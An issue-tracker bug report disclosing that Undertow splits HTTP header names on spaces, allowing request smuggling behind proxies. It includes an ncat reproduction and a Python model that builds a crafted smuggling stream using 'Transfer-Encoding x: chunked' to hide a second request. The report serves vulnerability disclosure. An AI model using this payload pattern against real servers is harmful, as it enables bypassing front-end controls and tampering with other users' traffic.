Undertow / UNDERTOW-2594

Undertow splits header names from values on spaces


    • Type: Bug
    • Resolution: Unresolved
    • Priority: Major
    • Component: Core

      1. Start up an Undertow-based web server that echoes received headers, such as this one: https://github.com/narfindustries/http-garden/blob/main/images/undertow/GardenServer.java
      2. Send it a request with a space in a header name, and observe the effect:

      printf 'GET / HTTP/1.1\r\nHost: whatever\r\nthis is a: test\r\n\r\n' | \
      ncat localhost 80 | \
      grep "headers" | \
      jq '.headers[0][0]' | \
      xargs echo | \
      base64 -d | \
      od -tcx1

      0000000 t h i s
      74 68 69 73
      0000004

      Note that the decoded header name is "this". That's a problem because from the perspective of an upstream proxy that forwards spaces in header names (like AWS CloudFront), the header name is "this is a". This discrepancy can be used on framing-related headers for request smuggling.

      Undertow splits header names from values on either space or colon, whichever comes first. This allows for the construction of crafted requests with headers that are visible only to Undertow, but not upstream proxies, which can be used to launch request smuggling attacks.

      (I reported this to the security list in March, but the issue was closed without a substantive response.)
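The discrepancy described above, modelled offline as an added example. This is not Undertow's parser and not the reporter's code: it implements two header-name parsers (a colon-only splitter standing in for a forwarding proxy, and a space-or-colon splitter standing in for the behaviour the report describes) and frames one constructed byte stream under each. Two things are assumptions, not facts from the report: what the space-splitting parser does with the bytes between the space and the colon (this model takes the value from after the first colon), and that a chunked Transfer-Encoding takes precedence over Content-Length (RFC 9112 section 6.3). The request path /smuggled and the Host value are constructed for the example.

```python
# Added example for UNDERTOW-2594 (not Undertow's code, not the reporter's).
# Models two header-name parsers and shows how the same bytes frame into a
# different number of requests under each. Assumptions are marked below.


def proxy_header_name(line: bytes) -> bytes:
    """Name as seen by a forwarder that splits on the first colon only."""
    return line.partition(b":")[0]


def undertow_like_header_name(line: bytes) -> bytes:
    """Name cut at the first space or colon, whichever comes first
    (the behaviour the report describes)."""
    for i, c in enumerate(line):
        if c in (0x20, 0x3A):
            return line[:i]
    return line


def parse_head(head: bytes, name_fn):
    """Return (start line, {lowercased name: value}) for a request head.
    ASSUMPTION: the value is taken from after the first colon regardless of
    where name_fn cut the name; the report does not show Undertow's value."""
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        value = line.partition(b":")[2].strip()
        headers[name_fn(line).strip().lower()] = value
    return lines[0], headers


def read_chunked(data: bytes):
    """Consume a chunked body without trailers; return (body, remainder)."""
    body = b""
    while True:
        size_line, _, data = data.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            data = data.partition(b"\r\n")[2]  # CRLF that ends the 0 chunk
            return body, data
        body += data[:size]
        data = data[size + 2:]  # chunk data plus its trailing CRLF


def split_requests(stream: bytes, name_fn):
    """Frame a byte stream into (start line, body) pairs using name_fn.
    ASSUMPTION: chunked Transfer-Encoding wins over Content-Length."""
    requests = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break  # incomplete head, nothing more to frame
        start, headers = parse_head(head, name_fn)
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            body, rest = read_chunked(rest)
        else:
            n = int(headers.get(b"content-length", b"0"))
            body, rest = rest[:n], rest[n:]
        requests.append((start, body))
        stream = rest
    return requests


# Constructed stream: one POST whose Content-Length covers a chunked
# terminator followed by a complete second request. The header
# "Transfer-Encoding x" is an unknown name to the colon-only parser but
# becomes "Transfer-Encoding" for the space-splitting one.
SMUGGLED = b"GET /smuggled HTTP/1.1\r\nHost: example\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED
STREAM = (
    b"POST / HTTP/1.1\r\n"
    + b"Host: example\r\n"
    + b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    + b"Transfer-Encoding x: chunked\r\n"
    + b"\r\n"
    + BODY
)

if __name__ == "__main__":
    for label, fn in (("proxy", proxy_header_name),
                      ("undertow-like", undertow_like_header_name)):
        print(label, [start for start, _ in split_requests(STREAM, fn)])
```

Run as a script it prints one start line for the colon-only parser and two for the space-splitting one: the proxy forwards a single POST with a 46-byte body, while the space-splitting model ends that POST at the 0 chunk and treats the remaining bytes as a second request. The same discrepancy applies to any framing header whose name can be extended past a space.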

              Assignee: Richard Opalka (ropalka)
              Reporter: Ben Kallus (kenballus)
              Votes: 0
              Watchers: 1